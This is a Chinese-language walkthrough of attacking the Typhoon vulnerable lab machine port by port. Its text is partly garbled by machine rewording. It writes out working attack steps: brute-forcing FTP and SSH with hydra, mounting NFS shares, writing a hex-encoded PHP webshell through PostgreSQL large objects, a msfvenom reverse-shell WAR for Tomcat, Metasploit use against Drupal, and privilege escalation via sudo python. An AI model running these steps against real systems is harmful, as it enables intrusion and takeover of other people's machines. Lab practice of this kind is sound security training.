这个靶机挺多漏洞,知识点很广,以是决定自己来打一遍,算是复习一些良久前的知识点,就从一个端口一个端口来渗透吧,看看有什么知识点

端口扫描

25端口用户名列举

为啥选这个端口呢,由于后面要渗透21和22端口很大可能会爆破,25端口版本为Postfix smtpd,可以进行用户名列举,为后面爆破供应方便

php导出war包typhoon靶机渗入渗出 Node.js

存在root、typhoon、admin这三个用户

未授权访问

利用nc连接25端口不过貌似不能发邮件

21端口

首先在网上搜了一下vsftpd 3.0.2这个版本有没有什么漏洞,没有结果,于是考试测验一些通用的基本操作

ftp匿名访问

探测了一下创造存在ftp匿名访问

于是登录一下,查看当前路径及列目录

考试测验上传文件

创造权限不许可,以是21端口暂时没有其它利用办法

ftp爆破

由于知道了存在以上用户,以是利用hydra爆破

得到了typhoon的密码连续爆破admin的密码,同样成功爆破

root爆破无果

22端口

账号密码和21端口一样

111&2049端口

这是一个NFS做事,测试一下是否存在未授权访问许可挂载文件,确实存在

查询目标NFS共享目录情形

showmount -e 192.168.80.4

然后挂载typhoon目录

mount -t nfs 192.168.80.4:/typhoon /tmp/mut/

445端口

利用enum4linux列举目标共享信息

enum4linux 192.168.80.4

也顺便列出了存在的用户名typhoon、admin、postfixuser

创造许可空账户、空密码登录,共享文件typhoon远程挂载,密码随便输就行

5432端口

这个端口是PostgreSQL数据库,考试测验爆破一下账号密码账号密码都为postgres

读/etc/passwd

DROP TABLE if EXISTS ghtwf01;CREATE TABLE ghtwf01(t TEXT);COPY ghtwf01 FROM '/etc/passwd';SELECT FROM ghtwf01;

写一句话

创建OID,清空内容

SELECT lo_create(4444);delete from pg_largeobject where loid=4444;

将一句话木马16进制编码为

3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E

插入

insert into pg_largeobject (loid,pageno,data) values(4444, 0, decode('3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E', 'hex'));

导出数据到指定文件

SELECT lo_export(4444, '/var/www/html/shell.php');

成功getshell

6379端口

这个端口是Redis,测试一下是否存在未授权访问确实存在

Redis利用办法有三种

1.Redis写webshell2.Redis写操持任务反弹shell3.Redis写ssh公钥

详细见我之前写的一篇Redis利用办法总结:https://www.ghtwf01.cn/index.php/archives/407/

80端口drupal Drupalgeddon 2远程代码实行(CVE-2018-7600)

目录扫描创造了它,直接上msf

LotusCMS 远程代码实行

在cms目录,同样msf

dvwa

账号密码是默认的admin/password这里面全是洞,直接命令实行弹shell

phpmyadmin

利用dvwa里面的文件包含漏洞或获取dvwa配置文件信息拿到数据库账号密码登录

8080端口

创造是Tomcat,先目录扫描一下,找到后台manager,须要账号密码利用msf爆破一下

账号密码都为tomcat进入后台创造版本号7.0.52,有上传点,以是便是支配war后门

手动

利用msf天生war包后门

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.80.130 lport=4444 -f war -o shell.war

打开拓现后门名叫hmmliavgsqxlddq.jsp上传shell.war访问shell/hmmliavgsqxlddq.jsp反弹shell

自动

msf一把梭

权限提升

这里演示几种提权办法

内核提权

uname -a查看内核版本

搜索一下,创造存在内核提权

然后上传exp,编译运行

配置不当提权

先切换成bash

python -c 'import pty;pty.spawn("/bin/bash")'

创造在tab目录下有一个script.sh文件所有用户都可以操作,于是在里面写入反弹shell命令,但是反弹过来的不是root权限,而且返回来的shell还挺难操作,有点迷

看到可以利用nc,于是利用msf里面的nc反弹shell

然后成功反弹shell

sudo提权

条件是已经获得当前普通用户的密码,并且当前用户属于sudo组,这里利用的admin用户查看一下sudo权限范围

由于安全了python,直接

sudo python -c 'import pty;pty.spawn("/bin/bash")'

拿到root权限

或者sudo -i

方法很多